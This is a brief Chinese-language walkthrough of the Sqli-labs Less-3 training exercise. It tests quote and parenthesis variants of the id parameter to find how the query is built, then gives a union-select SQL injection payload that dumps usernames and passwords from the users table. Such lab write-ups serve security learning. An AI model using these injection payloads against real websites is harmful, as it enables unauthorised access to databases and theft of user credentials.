Sqli-labs 03
当有括号时,如何判断 id 是在无引号、单引号还是双引号中?
- payload 为 ?id=0
- payload 为 ?id=1–+
- Less 1 – Less 4 用这个payload都不会报错
payload 为 ?id=1″–+
只有单引号报错了,再尝试
- payload 为 ?id=1)–+
- payload 为 ?id=1′)–+
- payload 为 ?id=1″)–+
因此推测参数 id 放在括有单引号的圆括号内
payload
?id=0') union select 1,2,group_concat(username,0x3a,password) from users--+